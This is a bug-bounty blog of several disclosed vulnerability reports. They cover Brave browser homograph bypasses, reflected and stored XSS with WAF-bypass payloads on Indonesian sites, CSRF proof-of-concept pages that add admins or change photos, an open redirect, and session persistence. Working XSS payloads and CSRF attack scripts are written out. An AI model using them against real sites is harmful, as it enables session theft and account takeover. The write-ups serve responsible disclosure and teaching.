Bypassing Homograph Attack Using `@` On Brave Browser

After a few month not hunting bug, and i want to hunt again. I read my previous report about Bypassing Homograph and look at the patch code. And I think I can bypass it, with some trick.

I see code on Brave Github patch on previous report, and with minimum programming skill try to bypassing homograph. I notice on their code is something like this. :

it('returns the punycode URL when given a valid URL', function () {
    assert.equal(urlUtil.getPunycodeUrl('http://brave:brave@ebа'), '')

I notice on url between @ , the URL after @ is containing punycode, and get return to ASCII , and my weird logic think if before @ the punycode it’s doesn’t return to ASCII,

And this is How I Reproduce it  :

This is punycode URL ebаа = .

Set it to homepage

Attempt : 
- ebаа it'll become = ebа 
- ebаа it'll become = xn--eby-7cd.xn--com/
- ebаа it'll become = ebа

And this is true before @ doesn’t return to ASCII ,  so to visit the link before @ i give / after punycode. So, when user input ebа user will redirect to :

Video :

And I report to Brave tim on Hackerone , you can see my report on : . The brave tim very fast when patching it. And i got rewarded with bounty. Yeay!

And I say thanks to them with some GIF because very fast reply and patching although there’s just minor bug.

This is the GIF

You can see the patching on their github also on :


Reflected XSS On Search Product via AngularJS Template Injection [ ]

Description :

I’ve found Reflected XSS on via AngularJs , I found this by write {{31338-1}} on their search page and found result 31337 . And i also read h1 report from ysx  for my reference to exploit this.

And I use payload from ysx to exploit AngularJS with {{constructor.constructor(‘alert(document.domain)’)()}} payload.

POC (Piye Om Carane ):

  1. login to account
  2. insert the payload to search field
  3. and XSS will fire up


Screenshoot :

It fixed 1 day after I report to them.

Reference :


Note: I got permission to disclose this report from bukalapak

For Indonesia Languange, you can see my original report on :


Bypass Stored XSS on User Edit [ ]


I’ve found Stored XSS on user edit in name field, actually have WAF to protect it, but i found some payload to bypass it.

Detail : 

Location Of Bug :

Payload : 

"'--!><Script /K/>confirm(1)</Script /K/>#

Step To Reproduce :

  1. Login to your MatahariMall account
  2. Go to User Edit
  3. Add your name with Payload
  4. Save it

It will showing up the XSS and when you access another page, it also will showing up, because the name of your account will be displayed at another page.

Browser :

  1. Chrome And Firefox

Note :

Team of fix the bug after 1 day I send report, Wow!


Video :

Bypassing XSS

So, after them patching my previous report i going to bypass it, and i bypass it with new payload.

Payload : –!”><svg/onload=confirm(“1”)>

And it pop up the XSS,

it’s a many way to bypass the firewall.


Homograph Attack Bypass On Brave Browser

Hi guys, at this time i try to test Brave Browser , because i challenge myself to test something except website application and will see what i can do with it. While I search about Browser bug in I find report about Homograph attack in browser at 175286 and I try it, but its has been patched, so I find another way to attack it. And I try to read more reference about browser and i read URI Obfuscation  that give me idea how about adding @ when add punycode ? and boom. Its work, Brave Browser not validate a url properly like previous report. And This is My Report, but before i send report I check it on chrome, and the chrome response is showing the true URL.


At #175286 you has been patched, and i try it work, but i’ve another way to bypass it. when we add a site to our Homepage with @, it’s not validate a url properly, make sure it’s display the punycode.

Products affected:

Brave 0.18.36 ( Linux & Windows )

Steps To Reproduce:

  • In browser add homepage with IDN @ebа
  • Now close and open browser again
  • You can see it’s redirect to

Video :

And two days after that the Brave team update my report to triaged and give me bounty ( half of first reporter ) , but i not satisfied with that (Am I so greedy ) >.< , and ask information, why ? and Brave team said “this was awarded lower because it requires the URL to start with ‘@’ which users would probably notice since it looks odd” and i think its true, so i dig it again, how can I attack it without ‘@’ and I try different way to attack it, and I’ve found the ‘@’ not required on url, so just use URL like this ebа . And the Brave team said “seems valid” and give me extra bounty. Yay !


Missing CSRF Token On Add Admin [Popoji CMS]


This is happen because when request add admin there’s no CSRF token
Step To Reproduce :

<script>function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack"POST", "http://root/popoji/poadmin/
route.php?mod=user&act=addnew", true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
<button>Let's Rock</button>

1. Save code to .html
2. upload them to host
3. execute it.

Video :

Fix & Mitigation :

give token when request sensitive action.

them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !

Session Not Expired When Password Has Been Changed []


When user change password from another platform, the previous platform still connect to account and still can edit the profile.


1. Login on mozilla,
2. Login on Chrome,
3. change the password on chrome.
4. back to mozilla, you still able to access the account
5. you still can edit profile.

Video : (unlisted )

Note : I ask permission to to write it on my blog, and them give me the permission, so I write here,

Hope you enjoy~

Open Redirect On

Description : 

Open redirects and forwards are possible when a web application accepts untrusted
input that could cause the web application to redirect the request to a URL contained within untrusted
input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a
phishing scam and steal user credentials. Because the server name in the modified link is identical to the

original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and
forward attacks can also be used to maliciously craft a URL that would pass the application’s access
control check and then forward the attacker to privileged functions that they would normally not be
able to access.

Impact :

Force user go to untrusted website from codepolitan website

Location of bug :

Payload :

Reproduce :

1. Open
2. Login, and you will be redirect to

Conclusion : 

Open redirect make user not safe because force user go to untrusted website ( scam
/phising) without user know

Video : 

Note :

Codepolitan crew its very fast on patch the bug, and them also will give me the SWAG and add my name on their hall of fame, yeay !

Credit :

Missing CSRF Token On Change Picture Request []


Actually i found many CSRF issue on tokopedia, but i just write this on my blog if you want to see all of them just go to my old blog :


This bug because when change picture there’s no CSRF token to cover it.

Vuln Request

POST /ajax/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close

Poc Code:

      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack"POST", "", true);
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
<button onclick="getMe();">Let's Rock</button>

Note: file_path is another user photo

Step to reproduce:

  • Save Code .html
  • Click `Lets Rock`
  • Photo will be update with photo from file_path

Video :

XSS On Kaskus

This is old bug i found on 2016, i write this on my new blog to sharing what i found, because i think its bug is very interesting and unique.


This bug is unique, because XSS exposed when redirect to previous page after login.

Step To Reproduce

  • Go to
  • Change parameter to “><img+src%3Dx+onerror%3Dprompt(‘XSS/By/LocalHost’)%3B>
  • Login with widget on top  and you will redirect
  • And XSS will be exposed

Http Header response : 


Video : 

Note :

Kaskus Response is very quick and i got SWAG from them.